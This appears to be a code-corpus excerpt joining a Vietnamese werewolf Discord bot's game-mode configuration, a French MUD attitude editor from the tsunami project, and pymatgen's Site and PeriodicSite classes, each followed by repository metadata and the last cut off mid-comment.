0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2], 'fool' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'cursed villager' : [0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3], 'gunner' : [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]} }, 'foolish' : { 'description' : "Cẩn thận, vì thằng ngu có thể nhảy ra từ bất kì đâu để cướp chiến thắng!.", 'min_players' : 8, 'max_players' : 20, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20 'wolf' : [0, 0, 0, 0, 1, 1, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3], 'werecrow' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'werekitten' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'sorcerer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'shaman' : [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2], 'harlot' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2], 'hunter' : [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'detective' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1], 'villager' : [0, 0, 0, 0, 3, 3, 3, 2, 2, 3, 4, 3, 4, 3, 4, 5, 5], 'crazed shaman' : [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'fool' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'cursed villager' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'gunner' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1]} }, 'chaos' : { 'description' : "Hỗn loạn và khó lường. Bất cứ ai, kể cả sói, đều có thể sở hữu súng.", 'min_players' : 4, 'max_players' : 16, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16 'wolf' : [1, 1, 1, 1, 1, 1, 2, 2, 2, 3, 3, 3, 3], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 2, 2], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'shaman' : [3, 4, 4, 4, 3, 4, 3, 2, 3, 1, 2, 1, 1], 'harlot' : [0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4], 'villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'crazed shaman' : [0, 0, 0, 0, 1, 1, 1, 2, 2, 3, 3, 4, 4], 'fool' : [0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], 'cursed villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'gunner' : [1, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3]} }, 'orgy' : { 'description' : "Cẩn thận người bạn sẽ ăn nằm cùng đêm nay! 
( ͡° ͜ʖ ͡°)", 'min_players' : 4, 'max_players' : 16, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16 'wolf' : [1, 1, 1, 1, 1, 1, 2, 2, 2, 3, 3, 3, 3], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 2, 2], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'shaman' : [0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4], 'harlot' : [3, 4, 4, 4, 3, 4, 3, 2, 3, 1, 2, 1, 1], 'villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'crazed shaman' : [0, 0, 0, 0, 1, 1, 1, 2, 2, 3, 3, 4, 4], 'fool' : [0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], 'cursed villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]} }, 'crazy' : { 'description' : "Thật nhiều bùa chú ngẫu nhiên!.", 'min_players' : 4, 'max_players' : 16, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16 'wolf' : [1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 2], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 2, 2, 2], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'shaman' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'harlot' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'crazed shaman' : [3, 4, 5, 6, 5, 6, 7, 7, 7, 8, 8, 9, 9], 'fool' : [0, 0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3], 'cursed villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]} }, 'belunga' : { 'description' : "Gamemode điên khùng cho ngày cá tháng tư =)).", 'min_players' : 4, 'max_players' : 20, 'roles' : {} }, 'random' : { 'description' : "Ngoài việc đảm bảo trò chơi sẽ không kết thúc ngay lập tức, chả ai biết sẽ có vai nào xuất hiện.", 'min_players' : 8, 'max_players' : 16, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16 'wolf' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'werecrow' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'werekitten' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'traitor' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'shaman' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'harlot' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'hunter' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'crazed shaman' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'cursed villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'gunner' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]} }, 'template' : { 'description' : "This is a template you can use for making your own gamemodes.", 'min_players' : 0, 'max_players' : 0, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16 'wolf' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'werecrow' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'werekitten' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'traitor' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'cultist' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'seer' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'shaman' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'harlot' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'hunter' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'detective' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'crazed shaman' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'cursed villager' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'gunner' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]} } } gamemodes['belunga']['roles'] = dict(gamemodes['default']['roles']) VILLAGE_ROLES_ORDERED = ['seer', 'shaman', 'harlot', 'hunter', 'detective', 'villager'] WOLF_ROLES_ORDERED = ['wolf', 'werecrow', 'werekitten', 'traitor', 
'sorcerer', 'cultist'] NEUTRAL_ROLES_ORDERED = ['crazed shaman', 'fool'] TEMPLATES_ORDERED = ['cursed villager', 'gunner'] totems = {'death_totem' : 'Người chơi nhận được bùa này sẽ hi sinh tối nay.', 'protection_totem': 'Người chơi nhận được bùa này sẽ được bảo vệ đêm nay.', 'revealing_totem': 'Nếu người nhận được bùa này bị treo cổ, vai của họ sẽ bị lộ thay vì phải chết.', 'influence_totem': 'Giá trị phiếu bầu của người sở hữu lá bùa này sẽ gấp đôi người thường vào sáng mai.', 'impatience_totem' : 'Người giữ lá bùa này sẽ vote cho tất cả người chơi trừ họ vào sáng mai, cho dù họ có muốn vote hay không.', 'pacifism_totem' : 'Người giữ lá bùa này sẽ bỏ phiếu trắng cho tất cả người chơi vào sáng mai dù họ có muốn vote hay không.', 'cursed_totem' : 'Người sỡ hữu lá bùa này sẽ bị nguyền rủa nếu họ không bị nguyền rủa sẵn.', 'lycanthropy_totem' : 'Người giữ lá bùa này nếu bị giết bởi sói vào tối nay, họ sẽ không chết mà hóa sói.', 'retribution_totem' : 'Nếu người giữ lá bùa này bị giết bởi sói vào tối nay thì họ sẽ giết 1 con sói ngẫu nhiên để trả thù.', 'blinding_totem' : 'Người giữ lá bùa này sẽ bị chấn thương và không thể vote vào sáng mai.', 'deceit_totem' : 'Nếu người giữ lá bùa này bị soi bởi tiên tri tối nay thì kết quả soi của tiên tri sẽ trái ngược với sự thật ' 'Nếu tiên tri giữ lá bùa này, kết quả soi tối nay của họ sẽ bị đảo ngược.'} SHAMAN_TOTEMS = ['death_totem', 'protection_totem', 'revealing_totem', 'influence_totem', 'impatience_totem', 'pacifism_totem', 'retribution_totem'] ROLES_SEEN_VILLAGER = ['werekitten', 'traitor', 'sorcerer', 'cultist', 'villager', 'fool'] ROLES_SEEN_WOLF = ['wolf', 'werecrow', 'cursed'] ACTUAL_WOLVES = ['wolf', 'werecrow', 'werekitten'] WOLFCHAT_ROLES = ['wolf', 'werecrow', 'werekitten', 'traitor', 'sorcerer', 'cultist'] ########### END POST-DECLARATION STUFF ############# client.loop.create_task(do_rate_limit_loop()) client.loop.create_task(backup_settings_loop()) client.run(TOKEN)
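# ---------------------------------------------------------------------------
# Editor's illustrative sketch -- NOT part of the original bot.py above.
# The day phase resolves a lynch only once one target reaches a strict
# majority of living, un-injured voters (len(voters) // 2 + 1), breaking
# exact ties at that threshold randomly. A minimal, self-contained rendering
# of just that rule (function name and sample data are hypothetical; abstains
# and the totem vote-weights handled by get_votes() above are omitted):
import random

def resolve_lynch(votes, eligible_voters):
    """Return the lynched player id, or None if no strict majority formed.

    votes: dict mapping voter id -> target id
    eligible_voters: iterable of living, un-injured player ids
    """
    needed = len(list(eligible_voters)) // 2 + 1
    tally = {}
    for target in votes.values():
        tally[target] = tally.get(target, 0) + 1
    if not tally:
        return None
    top = max(tally.values())
    if top < needed:
        return None
    leaders = [p for p, n in tally.items() if n == top]
    return random.choice(leaders)  # mirrors the bot's random tie-break

# Example: 5 eligible voters, so 3 votes are needed to lynch.
# resolve_lynch({'a': 'w', 'b': 'w', 'c': 'w', 'd': 'e'}, 'abcde') -> 'w'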
Luc1fer666/Discord_project
bot.py
Python
mit
176,146
[ "VisIt" ]
5baa61d2c7ed5a1e3effb411af4cf3a5c62fae324c11a2a603a44ec999301779
# -*-coding:Utf-8 -* # Copyright (c) 2010-2017 LE GOFF Vincent # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # * Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """Package contenant l'éditeur 'socedit'. Si des redéfinitions de contexte-éditeur standard doivent être faites, elles seront placées dans ce package. Note importante : ce package contient la définition d'un éditeur, mais celui-ci peut très bien être étendu par d'autres modules. Auquel cas, les extensions n'apparaîtront pas ici. """ from primaires.interpreteur.editeur import Editeur from primaires.communication.attitude import STATUTS class EdtSocedit(Editeur): """Classe définissant l'éditeur d'attitude 'socedit'. """ nom = "socedit" def __init__(self, personnage, objet, attribut=None): """Constructeur de l'éditeur""" if personnage: instance_connexion = personnage.instance_connexion else: instance_connexion = None Editeur.__init__(self, instance_connexion, objet, attribut) self.personnage = personnage self.ajouter_option("q", self.opt_quitter) self.ajouter_option("aim", self.opt_aim) self.ajouter_option("aif", self.opt_aif) self.ajouter_option("oim", self.opt_oim) self.ajouter_option("oif", self.opt_oif) self.ajouter_option("adm", self.opt_adm) self.ajouter_option("adf", self.opt_adf) self.ajouter_option("idm", self.opt_idm) self.ajouter_option("idf", self.opt_idf) self.ajouter_option("odm", self.opt_odm) self.ajouter_option("odf", self.opt_odf) def __getnewargs__(self): return (None, None) def accueil(self): """Méthode d'accueil de l'éditeur""" attitude = self.objet msg = "| |tit|Edition de l'attitude {}|ff|".format( attitude.cle).ljust(87) + "|\n" msg += self.opts.separateur + "\n" msg += \ "Utilisez une des options pour paramétrer l'attitude.\n" \ "Statut actuel de l'attitude : |rg|" + \ STATUTS[attitude.statut] + "|ff|\n" \ "Clé (commande entrée par le joueur) : |cmd|" + \ attitude.cle + "|ff|\n\n" \ "Options :" \ "\n - |cmd|/aim|ff|, |cmd|/aif|ff|, |cmd|/oim|ff|... 
: édite un " \ "paramètre de l'attitude" \ "\n - |cmd|/q|ff| : permet de quitter l'éditeur\n\n" msg += "AIM (Acteur Indépendant Masculin) :\n |vr|" msg += attitude.independant["aim"] or \ "|grf|Vous vous faites tout petit." msg += "|ff|\nAIF (Acteur Indépendant Féminin) :\n |vr|" msg += attitude.independant["aif"] or \ "|grf|Vous vous faites toute petite." msg += "|ff|\nOIM (Observateur Indépendant Masculin) :\n |vr|" msg += attitude.independant["oim"] or \ "|grf||acteur| se fait tout petit." msg += "|ff|\nOIF (Observateur Indépendant Féminin) :\n |vr|" msg += attitude.independant["oif"] or \ "|grf||acteur| se fait toute petite." msg += "|ff|\nADM (Acteur Dépendant Masculin) :\n |vr|" msg += attitude.dependant["adm"] or \ "|grf|Vous vous faites tout petit devant |cible|." msg += "|ff|\nADF (Acteur Dépendant Féminin) :\n |vr|" msg += attitude.dependant["adf"] or \ "|grf|Vous vous faites toute petite devant |cible|." msg += "|ff|\nIDM (Interlocuteur Dépendant Masculin) :\n |vr|" msg += attitude.dependant["idm"] or \ "|grf||acteur| se fait tout petit devant vous." msg += "|ff|\nIDF (Interlocuteur Dépendant Féminin) :\n |vr|" msg += attitude.dependant["idf"] or \ "|grf||acteur| se fait toute petite devant vous." msg += "|ff|\nODM (Observateur Dépendant Masculin) :\n |vr|" msg += attitude.dependant["odm"] or \ "|grf||acteur| se fait tout petit devant |cible|." msg += "|ff|\nODF (Observateur Dépendant Féminin) :\n |vr|" msg += attitude.dependant["odf"] or \ "|grf||acteur| se fait toute petite devant |cible|." return msg + "|ff|" def opt_quitter(self, arguments): """Option quitter""" self.fermer() self.pere.envoyer("Fermeture de l'éditeur.") def opt_aim(self, arguments): self.objet.independant["aim"] = arguments self.actualiser() def opt_aif(self, arguments): self.objet.independant["aif"] = arguments self.actualiser() def opt_oim(self, arguments): self.objet.independant["oim"] = arguments self.actualiser() def opt_oif(self, arguments): self.objet.independant["oif"] = arguments self.actualiser() def opt_adm(self, arguments): self.objet.dependant["adm"] = arguments self.actualiser() def opt_adf(self, arguments): self.objet.dependant["adf"] = arguments self.actualiser() def opt_idm(self, arguments): self.objet.dependant["idm"] = arguments self.actualiser() def opt_idf(self, arguments): self.objet.dependant["idf"] = arguments self.actualiser() def opt_odm(self, arguments): self.objet.dependant["odm"] = arguments self.actualiser() def opt_odf(self, arguments): self.objet.dependant["odf"] = arguments self.actualiser()
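# ---------------------------------------------------------------------------
# Editor's sketch -- not part of the original tsunami source above. The ten
# opt_aim ... opt_odf handlers differ only in which dict ('independant' or
# 'dependant') and which key they assign before refreshing the editor. A
# hedged way to generate them, assuming only the EdtSocedit API shown above
# (behaviour-preserving; the constructor's ajouter_option() calls and the
# explicit methods remain valid, the generated ones simply shadow them):
def _make_attitude_option(group, key):
    def handler(self, arguments):
        getattr(self.objet, group)[key] = arguments
        self.actualiser()
    return handler

for _key in ("aim", "aif", "oim", "oif"):
    setattr(EdtSocedit, "opt_" + _key, _make_attitude_option("independant", _key))
for _key in ("adm", "adf", "idm", "idf", "odm", "odf"):
    setattr(EdtSocedit, "opt_" + _key, _make_attitude_option("dependant", _key))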
vlegoff/tsunami
src/primaires/communication/editeurs/socedit/__init__.py
Python
bsd-3-clause
6,968
[ "ADF" ]
a7237db14125dfc52ab0ad0c50a56b6d7526891f9011625cec8f2a2373a40180
# coding: utf-8 from __future__ import division, unicode_literals """ This module defines classes representing non-periodic and periodic sites. """ __author__ = "Shyue Ping Ong" __copyright__ = "Copyright 2012, The Materials Project" __version__ = "0.1" __maintainer__ = "Shyue Ping Ong" __email__ = "shyuep@gmail.com" __date__ = "Jul 17, 2012" import collections import numpy as np from pymatgen.core.lattice import Lattice from pymatgen.core.periodic_table import Element, Specie, DummySpecie,\ get_el_sp from pymatgen.serializers.json_coders import PMGSONable from pymatgen.util.coord_utils import pbc_diff from pymatgen.core.composition import Composition class Site(collections.Mapping, collections.Hashable, PMGSONable): """ A generalized *non-periodic* site. This is essentially a composition at a point in space, with some optional properties associated with it. A Composition is used to represent the atoms and occupancy, which allows for disordered site representation. Coords are given in standard cartesian coordinates. """ position_atol = 1e-5 def __init__(self, atoms_n_occu, coords, properties=None): """ Create a *non-periodic* site. Args: atoms_n_occu: Species on the site. Can be: i. A sequence of element / specie specified either as string symbols, e.g. ["Li", "Fe2+", "P", ...] or atomic numbers, e.g., (3, 56, ...) or actual Element or Specie objects. ii. List of dict of elements/species and occupancies, e.g., [{"Fe" : 0.5, "Mn":0.5}, ...]. This allows the setup of disordered structures. coords: Cartesian coordinates of site. properties: Properties associated with the site as a dict, e.g. {"magmom": 5}. Defaults to None. """ if isinstance(atoms_n_occu, collections.Mapping): self._species = Composition(atoms_n_occu) totaloccu = self._species.num_atoms if totaloccu > 1 + Composition.amount_tolerance: raise ValueError("Species occupancies sum to more than 1!") self._is_ordered = totaloccu == 1 and len(self._species) == 1 else: self._species = Composition({get_el_sp(atoms_n_occu): 1}) self._is_ordered = True self._coords = coords self._properties = properties if properties else {} @property def properties(self): """ Returns a view of properties as a dict. """ return {k: v for k, v in self._properties.items()} def __getattr__(self, a): #overriding getattr doens't play nice with pickle, so we #can't use self._properties p = object.__getattribute__(self, '_properties') if a in p: return p[a] raise AttributeError(a) def distance(self, other): """ Get distance between two sites. Args: other: Other site. Returns: Distance (float) """ return np.linalg.norm(other.coords - self.coords) def distance_from_point(self, pt): """ Returns distance between the site and a point in space. Args: pt: Cartesian coordinates of point. Returns: Distance (float) """ return np.linalg.norm(np.array(pt) - self._coords) @property def species_string(self): """ String representation of species on the site. """ if self._is_ordered: return list(self._species.keys())[0].__str__() else: sorted_species = sorted(self._species.keys()) return ", ".join(["{}:{:.3f}".format(sp, self._species[sp]) for sp in sorted_species]) @property def species_and_occu(self): """ The species at the site, i.e., a Composition mapping type of element/species to occupancy. """ return self._species @property def specie(self): """ The Specie/Element at the site. Only works for ordered sites. Otherwise an AttributeError is raised. Use this property sparingly. Robust design should make use of the property species_and_occu instead. 
Raises: AttributeError if Site is not ordered. """ if not self._is_ordered: raise AttributeError("specie property only works for ordered " "sites!") return list(self._species.keys())[0] @property def coords(self): """ A copy of the cartesian coordinates of the site as a numpy array. """ return np.copy(self._coords) @property def is_ordered(self): """ True if site is an ordered site, i.e., with a single species with occupancy 1. """ return self._is_ordered @property def x(self): """ Cartesian x coordinate """ return self._coords[0] @property def y(self): """ Cartesian y coordinate """ return self._coords[1] @property def z(self): """ Cartesian z coordinate """ return self._coords[2] def __getitem__(self, el): """ Get the occupancy for element """ return self._species[el] def __eq__(self, other): """ Site is equal to another site if the species and occupancies are the same, and the coordinates are the same to some tolerance. numpy function `allclose` is used to determine if coordinates are close. """ if other is None: return False return self._species == other._species and \ np.allclose(self._coords, other._coords, atol=Site.position_atol) and \ self._properties == other._properties def __ne__(self, other): return not self.__eq__(other) def __hash__(self): """ Minimally effective hash function that just distinguishes between Sites with different elements. """ return sum([el.Z for el in self._species.keys()]) def __contains__(self, el): return el in self._species def __len__(self): return len(self._species) def __iter__(self): return self._species.__iter__() def __repr__(self): return "Site: {} ({:.4f}, {:.4f}, {:.4f})".format( self.species_string, *self._coords) def __lt__(self, other): """ Sets a default sort order for atomic species by electronegativity. Very useful for getting correct formulas. For example, FeO4PLi is automatically sorted in LiFePO4. """ if self._species.average_electroneg < other._species.average_electroneg: return True if self._species.average_electroneg > other._species.average_electroneg: return False if self.species_string < other.species_string: return True if self.species_string > other.species_string: return False return False def __str__(self): return "{} {}".format(self._coords, self.species_string) def as_dict(self): """ Json-serializable dict representation for Site. """ species_list = [] for spec, occu in self._species.items(): d = spec.as_dict() del d["@module"] del d["@class"] d["occu"] = occu species_list.append(d) return {"name": self.species_string, "species": species_list, "xyz": [float(c) for c in self._coords], "properties": self._properties, "@module": self.__class__.__module__, "@class": self.__class__.__name__} @classmethod def from_dict(cls, d): """ Create Site from dict representation """ atoms_n_occu = {} for sp_occu in d["species"]: if "oxidation_state" in sp_occu and Element.is_valid_symbol( sp_occu["element"]): sp = Specie.from_dict(sp_occu) elif "oxidation_state" in sp_occu: sp = DummySpecie.from_dict(sp_occu) else: sp = Element(sp_occu["element"]) atoms_n_occu[sp] = sp_occu["occu"] props = d.get("properties", None) return cls(atoms_n_occu, d["xyz"], properties=props) class PeriodicSite(Site, PMGSONable): """ Extension of generic Site object to periodic systems. PeriodicSite includes a lattice system. """ def __init__(self, atoms_n_occu, coords, lattice, to_unit_cell=False, coords_are_cartesian=False, properties=None): """ Create a periodic site. Args: atoms_n_occu: Species on the site. Can be: i. 
A sequence of element / specie specified either as string symbols, e.g. ["Li", "Fe2+", "P", ...] or atomic numbers, e.g., (3, 56, ...) or actual Element or Specie objects. ii. List of dict of elements/species and occupancies, e.g., [{"Fe" : 0.5, "Mn":0.5}, ...]. This allows the setup of disordered structures. coords (3x1 array or sequence): Coordinates of site as fractional or cartesian coordinates. lattice: Lattice associated with the site to_unit_cell (bool): Translates fractional coordinate to the basic unit cell, i.e. all fractional coordinates satisfy 0 <= a < 1. Defaults to False. coords_are_cartesian (bool): Set to True if you are providing cartesian coordinates. Defaults to False. properties (dict): Properties associated with the PeriodicSite, e.g., {"magmom":5}. Defaults to None. """ self._lattice = lattice if coords_are_cartesian: self._fcoords = self._lattice.get_fractional_coords(coords) c_coords = coords else: self._fcoords = coords c_coords = lattice.get_cartesian_coords(coords) if to_unit_cell: self._fcoords = np.mod(self._fcoords, 1) c_coords = lattice.get_cartesian_coords(self._fcoords) Site.__init__(self, atoms_n_occu, c_coords, properties) def __hash__(self): """ Minimally effective hash function that just distinguishes between Sites with different elements. """ return sum([el.Z for el in self._species.keys()]) @property def lattice(self): """ The lattice associated with the site. """ return self._lattice @property def frac_coords(self): """ A copy of the fractional coordinates of the site. """ return np.copy(self._fcoords) @property def a(self): """ Fractional a coordinate """ return self._fcoords[0] @property def b(self): """ Fractional b coordinate """ return self._fcoords[1] @property def c(self): """ Fractional c coordinate """ return self._fcoords[2] @property def to_unit_cell(self): """ Copy of PeriodicSite translated to the unit cell. """ return PeriodicSite(self._species, np.mod(self._fcoords, 1), self._lattice, properties=self._properties) def is_periodic_image(self, other, tolerance=1e-8, check_lattice=True): """ Returns True if sites are periodic images of each other. Args: other (PeriodicSite): Other site tolerance (float): Tolerance to compare fractional coordinates check_lattice (bool): Whether to check if the two sites have the same lattice. Returns: bool: True if sites are periodic images of each other. """ if check_lattice and self._lattice != other._lattice: return False if self._species != other._species: return False frac_diff = pbc_diff(self._fcoords, other._fcoords) return np.allclose(frac_diff, [0, 0, 0], atol=tolerance) def __eq__(self, other): return self._species == other._species and \ self._lattice == other._lattice and \ np.allclose(self._coords, other._coords, atol=Site.position_atol) and \ self._properties == other._properties def __ne__(self, other): return not self.__eq__(other) def distance_and_image_from_frac_coords(self, fcoords, jimage=None): """ Gets distance between site and a fractional coordinate assuming periodic boundary conditions. If the index jimage of two sites atom j is not specified it selects the j image nearest to the i atom and returns the distance and jimage indices in terms of lattice vector translations. If the index jimage of atom j is specified it returns the distance between the i atom and the specified jimage atom, the given jimage is also returned. Args: fcoords (3x1 array): fcoords to get distance from. 
jimage (3x1 array): Specific periodic image in terms of lattice translations, e.g., [1,0,0] implies to take periodic image that is one a-lattice vector away. If jimage == None, the image that is nearest to the site is found. Returns: (distance, jimage): distance and periodic lattice translations of the other site for which the distance applies. """ return self._lattice.get_distance_and_image(self._fcoords, fcoords, jimage=jimage) def distance_and_image(self, other, jimage=None): """ Gets distance and instance between two sites assuming periodic boundary conditions. If the index jimage of two sites atom j is not specified it selects the j image nearest to the i atom and returns the distance and jimage indices in terms of lattice vector translations. If the index jimage of atom j is specified it returns the distance between the ith atom and the specified jimage atom, the given jimage is also returned. Args: other (PeriodicSite): Other site to get distance from. jimage (3x1 array): Specific periodic image in terms of lattice translations, e.g., [1,0,0] implies to take periodic image that is one a-lattice vector away. If jimage == None, the image that is nearest to the site is found. Returns: (distance, jimage): distance and periodic lattice translations of the other site for which the distance applies. """ return self.distance_and_image_from_frac_coords(other._fcoords, jimage) def distance(self, other, jimage=None): """ Get distance between two sites assuming periodic boundary conditions. Args: other (PeriodicSite): Other site to get distance from. jimage (3x1 array): Specific periodic image in terms of lattice translations, e.g., [1,0,0] implies to take periodic image that is one a-lattice vector away. If jimage == None, the image that is nearest to the site is found. Returns: distance (float): Distance between the two sites """ return self.distance_and_image(other, jimage)[0] def __repr__(self): return "PeriodicSite: {} ({:.4f}, {:.4f}, {:.4f}) [{:.4f}, {:.4f}, " \ "{:.4f}]".format(self.species_string, self._coords[0], self._coords[1], self._coords[2], self._fcoords[0], self._fcoords[1], self._fcoords[2]) def as_dict(self): """ Json-serializable dict representation of PeriodicSite. """ species_list = [] for spec, occu in self._species.items(): d = spec.as_dict() del d["@module"] del d["@class"] d["occu"] = occu species_list.append(d) return {"label": self.species_string, "species": species_list, "xyz": [float(c) for c in self._coords], "abc": [float(c) for c in self._fcoords], "lattice": self._lattice.as_dict(), "properties": self._properties, "@module": self.__class__.__module__, "@class": self.__class__.__name__} @classmethod def from_dict(cls, d, lattice=None): """ Create PeriodicSite from dict representation. Args: d (dict): dict representation of PeriodicSite lattice: Optional lattice to override lattice specified in d. Useful for ensuring all sites in a structure share the same lattice. Returns: PeriodicSite """ atoms_n_occu = {} for sp_occu in d["species"]: if "oxidation_state" in sp_occu and Element.is_valid_symbol( sp_occu["element"]): sp = Specie.from_dict(sp_occu) elif "oxidation_state" in sp_occu: sp = DummySpecie.from_dict(sp_occu) else: sp = Element(sp_occu["element"]) atoms_n_occu[sp] = sp_occu["occu"] props = d.get("properties", None) lattice = lattice if lattice else Lattice.from_dict(d["lattice"]) return cls(atoms_n_occu, d["abc"], lattice, properties=props)
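# ---------------------------------------------------------------------------
# Editor's illustrative sketch -- not part of the original pymatgen module.
# It demonstrates the minimum-image behaviour of PeriodicSite.distance()
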